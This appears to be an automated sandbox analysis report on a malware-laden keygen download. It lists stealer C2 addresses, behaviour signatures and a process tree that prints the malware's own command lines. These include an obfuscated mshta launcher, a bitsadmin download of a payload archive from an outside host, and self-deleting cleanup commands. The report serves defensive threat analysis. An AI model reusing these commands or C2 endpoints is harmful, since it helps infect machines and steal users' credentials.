Analysis

  • max time kernel
    1801s
  • max time network
    1774s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 19:22

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 55 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 58 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2528
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2804
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2788
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2772
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2516
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1848
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1388
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1280
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1204
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1072
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:684
                        • C:\Users\Admin\AppData\Roaming\tjvcisi
                          C:\Users\Admin\AppData\Roaming\tjvcisi
                          2⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:1032
                        • C:\Users\Admin\AppData\Roaming\ssvcisi
                          C:\Users\Admin\AppData\Roaming\ssvcisi
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2340
                          • C:\Users\Admin\AppData\Roaming\ssvcisi
                            C:\Users\Admin\AppData\Roaming\ssvcisi
                            3⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5520
                        • C:\Users\Admin\AppData\Roaming\tjvcisi
                          C:\Users\Admin\AppData\Roaming\tjvcisi
                          2⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4232
                        • C:\Users\Admin\AppData\Roaming\ssvcisi
                          C:\Users\Admin\AppData\Roaming\ssvcisi
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:5700
                          • C:\Users\Admin\AppData\Roaming\ssvcisi
                            C:\Users\Admin\AppData\Roaming\ssvcisi
                            3⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:6116
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://keygenit.com/d/9472d2406f110qn26n09.html
                        1⤵
                        • Modifies Internet Explorer Phishing Filter
                        • Modifies Internet Explorer settings
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:624
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:624 CREDAT:82945 /prefetch:2
                          2⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          PID:3940
                      • \??\c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                        1⤵
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:892
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                          2⤵
                          • Drops file in System32 directory
                          • Checks processor information in registry
                          • Modifies data under HKEY_USERS
                          • Modifies registry class
                          PID:1772
                      • C:\Windows\System32\rundll32.exe
                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                        1⤵
                          PID:676
                        • C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_serial_keys_gen_by_FFF.zip\Trepcad_6_6_00_serial_keys_gen_by_FFF.exe
                          "C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_serial_keys_gen_by_FFF.zip\Trepcad_6_6_00_serial_keys_gen_by_FFF.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:360
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2856
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                              keygen-pr.exe -p83fsase3Ge
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1824
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3156
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                  5⤵
                                    PID:1292
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                keygen-step-1.exe
                                3⤵
                                • Executes dropped EXE
                                PID:3032
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                keygen-step-5.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1244
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:628
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "" == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2172
                                    • C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe
                                      MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2
                                      6⤵
                                      • Executes dropped EXE
                                      PID:704
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF ""/pkpxuxwmNl2s_EnQNC5XPVi2 "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                        7⤵
                                          PID:4484
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "/pkpxuxwmNl2s_EnQNC5XPVi2 " == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                            8⤵
                                              PID:4904
                                          • C:\Windows\SysWOW64\regsvr32.exe
                                            "C:\Windows\System32\regsvr32.exe" /U -S .\5VOMHR.c
                                            7⤵
                                            • Loads dropped DLL
                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                            PID:5008
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F -iM "keygen-step-5.exe"
                                          6⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4396
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                    keygen-step-2.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:1084
                                    • C:\Users\Admin\AppData\Roaming\D6F8.tmp.exe
                                      "C:\Users\Admin\AppData\Roaming\D6F8.tmp.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4504
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\D6F8.tmp.exe"
                                        5⤵
                                          PID:5964
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            6⤵
                                            • Delays execution with timeout.exe
                                            PID:4472
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                        4⤵
                                          PID:4692
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 127.0.0.1
                                            5⤵
                                            • Runs ping.exe
                                            PID:4852
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                        keygen-step-3.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:3440
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                          4⤵
                                            PID:2988
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping 1.1.1.1 -n 1 -w 3000
                                              5⤵
                                              • Runs ping.exe
                                              PID:4432
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                          keygen-step-4.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Suspicious use of WriteProcessMemory
                                          PID:3900
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            • Suspicious use of WriteProcessMemory
                                            PID:2096
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                              5⤵
                                              • Loads dropped DLL
                                              • Modifies registry class
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:1304
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2976
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5060
                                            • C:\Users\Admin\AppData\Local\Temp\is-87ACH.tmp\Install.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-87ACH.tmp\Install.tmp" /SL5="$50400,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5100
                                              • C:\Users\Admin\AppData\Local\Temp\is-8LK4Q.tmp\Ultra.exe
                                                "C:\Users\Admin\AppData\Local\Temp\is-8LK4Q.tmp\Ultra.exe" /S /UID=burnerch1
                                                6⤵
                                                • Drops file in Drivers directory
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Drops file in Program Files directory
                                                PID:4176
                                                • C:\Program Files\Windows Defender\NZLLRVKFFO\ultramediaburner.exe
                                                  "C:\Program Files\Windows Defender\NZLLRVKFFO\ultramediaburner.exe" /VERYSILENT
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4256
                                                  • C:\Users\Admin\AppData\Local\Temp\is-I3Q0H.tmp\ultramediaburner.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-I3Q0H.tmp\ultramediaburner.tmp" /SL5="$603D2,281924,62464,C:\Program Files\Windows Defender\NZLLRVKFFO\ultramediaburner.exe" /VERYSILENT
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:4608
                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:4596
                                                • C:\Users\Admin\AppData\Local\Temp\44-a2ff4-bf8-adf97-5babe29ff2a56\Micavoqyri.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\44-a2ff4-bf8-adf97-5babe29ff2a56\Micavoqyri.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  PID:4388
                                                • C:\Users\Admin\AppData\Local\Temp\20-d8423-3c5-0bda5-2322d3b431beb\Vaezhyhuxizhy.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\20-d8423-3c5-0bda5-2322d3b431beb\Vaezhyhuxizhy.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3476
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zqxcoagz.f3f\instEU.exe & exit
                                                    8⤵
                                                      PID:4708
                                                      • C:\Users\Admin\AppData\Local\Temp\zqxcoagz.f3f\instEU.exe
                                                        C:\Users\Admin\AppData\Local\Temp\zqxcoagz.f3f\instEU.exe
                                                        9⤵
                                                        • Executes dropped EXE
                                                        PID:752
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3zvjvu5m.kyo\md1_1eaf.exe & exit
                                                      8⤵
                                                        PID:4228
                                                        • C:\Users\Admin\AppData\Local\Temp\3zvjvu5m.kyo\md1_1eaf.exe
                                                          C:\Users\Admin\AppData\Local\Temp\3zvjvu5m.kyo\md1_1eaf.exe
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Checks whether UAC is enabled
                                                          PID:4128
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hicv3pxj.mkk\google-game.exe & exit
                                                        8⤵
                                                          PID:5748
                                                          • C:\Users\Admin\AppData\Local\Temp\hicv3pxj.mkk\google-game.exe
                                                            C:\Users\Admin\AppData\Local\Temp\hicv3pxj.mkk\google-game.exe
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:6044
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                              10⤵
                                                              • Loads dropped DLL
                                                              PID:4312
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zmpvrggj.jb1\y1.exe & exit
                                                          8⤵
                                                            PID:5612
                                                            • C:\Users\Admin\AppData\Local\Temp\zmpvrggj.jb1\y1.exe
                                                              C:\Users\Admin\AppData\Local\Temp\zmpvrggj.jb1\y1.exe
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:6016
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jk1k0msi.mrd\inst.exe & exit
                                                            8⤵
                                                              PID:5996
                                                              • C:\Users\Admin\AppData\Local\Temp\jk1k0msi.mrd\inst.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jk1k0msi.mrd\inst.exe
                                                                9⤵
                                                                  PID:5380
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\un4qclc1.yk3\SunLabsPlayer.exe /S & exit
                                                                8⤵
                                                                  PID:5188
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    9⤵
                                                                      PID:5748
                                                                    • C:\Users\Admin\AppData\Local\Temp\un4qclc1.yk3\SunLabsPlayer.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\un4qclc1.yk3\SunLabsPlayer.exe /S
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Drops file in Program Files directory
                                                                      PID:5048
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                        10⤵
                                                                          PID:1260
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          PID:5380
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                          10⤵
                                                                            PID:4584
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                            10⤵
                                                                              PID:1496
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                              10⤵
                                                                                PID:4372
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                10⤵
                                                                                  PID:4208
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                  10⤵
                                                                                  • Checks for any installed AV software in registry
                                                                                  PID:5096
                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                  10⤵
                                                                                  • Download via BitsAdmin
                                                                                  PID:1152
                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                  10⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:3840
                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                  10⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5660
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                  10⤵
                                                                                    PID:752
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                    10⤵
                                                                                      PID:5396
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                      10⤵
                                                                                        PID:4936
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                        10⤵
                                                                                          PID:2196
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                          10⤵
                                                                                            PID:5260
                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                            10⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:1784
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                              11⤵
                                                                                              • Loads dropped DLL
                                                                                              • Drops file in System32 directory
                                                                                              • Drops file in Program Files directory
                                                                                              PID:5232
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                            10⤵
                                                                                              PID:5164
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                              10⤵
                                                                                                PID:5360
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                                10⤵
                                                                                                  PID:704
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                                  10⤵
                                                                                                    PID:4440
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw609C.tmp\tempfile.ps1"
                                                                                                    10⤵
                                                                                                      PID:6056
                                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:5132
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pipg5iqo.jsh\GcleanerWW.exe /mixone & exit
                                                                                                  8⤵
                                                                                                    PID:5532
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gsvnhwd.nn2\toolspab1.exe & exit
                                                                                                    8⤵
                                                                                                      PID:5712
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5gsvnhwd.nn2\toolspab1.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\5gsvnhwd.nn2\toolspab1.exe
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4456
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5gsvnhwd.nn2\toolspab1.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\5gsvnhwd.nn2\toolspab1.exe
                                                                                                          10⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5288
